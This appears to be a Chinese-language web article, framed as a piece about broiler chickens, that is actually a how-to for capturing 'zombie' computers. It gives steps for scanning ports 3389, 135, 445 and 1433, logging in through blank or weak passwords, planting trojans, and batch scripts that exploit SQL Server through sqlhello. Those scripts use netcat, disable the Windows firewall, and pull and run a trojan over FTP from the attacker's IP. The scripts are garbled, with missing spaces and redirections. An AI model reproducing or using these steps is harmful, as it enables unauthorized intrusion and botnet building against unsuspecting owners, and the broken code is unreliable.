你们好，最近小艾特发现有诸多的小伙伴们对于肉鸡是公鸡还是母鸡，肉鸡这个问题都颇为感兴趣的，今天小活为大家梳理了下，一起往下看看吧。

1、 13389抓鸡

2、 目前国内网络上流传着一个克隆版的XP。安装后默认会开一个新账号空白密码的账号，基本上是3389，我们可以用这个来抓肉鸡。

3、 首先，使用端口扫描工具扫描一段IP端口3389。扫描后直接将打开3389的机器与远程桌面连接(也可以将结果保存为文本文件，用批量生成3389连接的工具连接)，然后输入账号new即可登录。

4、 如果别人电脑前没人，可以去你的空间下载你传的木马安装~ ~

5、 此方法仅适用于XP系统。如果遇到2000或者2003的系统，就不要尝试了。

6、 哈哈。缺点也很明显。如果有人没有用新账号登录XP，你重新登录就会把他挤掉(XP只支持单用户登录，用户需要使用工具登录)，或者有人在电脑前，你就打不开IE下载木马。

7、 2.扫描端口135肉鸡

8、 先用端口扫描器扫描一段IP端口135，然后保存结果，再用NTSCAN过滤掉弱密码的机器，最后用recton打开telnet传输木马。因为端口135和445现在被防火墙阻止，

9、 只能扫描本地135肉鸡，只能用外地135肉鸡扫。(详细动画

10、 可以去黑客网站搜135)

11、 3.扫描端口445肉鸡

12、 类似于扫描135肉鸡，先用端口扫描器扫描一段IP端口445，然后保存结果，再用NTSCAN过滤弱密码的机器，最后用D toolkit打开共享马。

13、 因为135和445端口现在都被防火墙屏蔽了，我们只能扫描本地的445肉鸡，只能用外地的445肉鸡来抓外地的。(详细动画请到黑客网站搜索445)

14、 4.端口1433的批量溢出肉鸡

15、 这个方法可以自动抓鸡，但是现在做的人太多了，成功率不高。要用的工具：s扫描sqlhello.exenc.exe批处理文件先写一个批处理，打开记事本，复制修改下面的代码

16、 另存为扫描溢出。蝙蝠文件

17、 @echooff

18、 for/f'eol=;tokens=1,2delims='%%iin(tt.txt)dos.exetcp%%i%%j

19、 14331000/save

20、 @echooff

21、 for/f'eol=;tokens=1delims='%%iin(Result.txt)dosqlhello%%i

22、 1433xxx.xxx.xx.xx556

23、 还要创建一个新的tt.txt，它包含您想要扫描的IP段。格式是

24、 XXX .XXX。XXX.XXXXXX.XXX.XXX.XXX，中间是空格

25、 1433是要扫描的端口，1000是扫描线程数，dosqlhello % % i % i。

26、 1433xxx.xxx.xx.xx556这个框里的xxx加你的IP，556是后面的NC主管。

27、 监听端口然后写一批。

28、 @echooff

29、 Nc-l-vv-p556daima.txt

30、 echousernamedaima.txt

31、 echopassworddaima.txt

32、 Echobindaima.txt(以二进制传输数据)

33、 echogetxxx.exe(你的木马的文件名，要放在根目录下)daima.txt

34、 echobyedaima.txt

35、 netstopsharedaccess(关闭WINDOWS自带防火墙)

36、 ftp-s:daima.txt

37、 xxx.exe(也是填你木马的文件名)

38、 deldaima.txt

39、 注意上面的代码回车符别删掉，要不然就没法下你的马了。

以上就是肉鸡这篇文章的一些介绍，希望对大家有所帮助。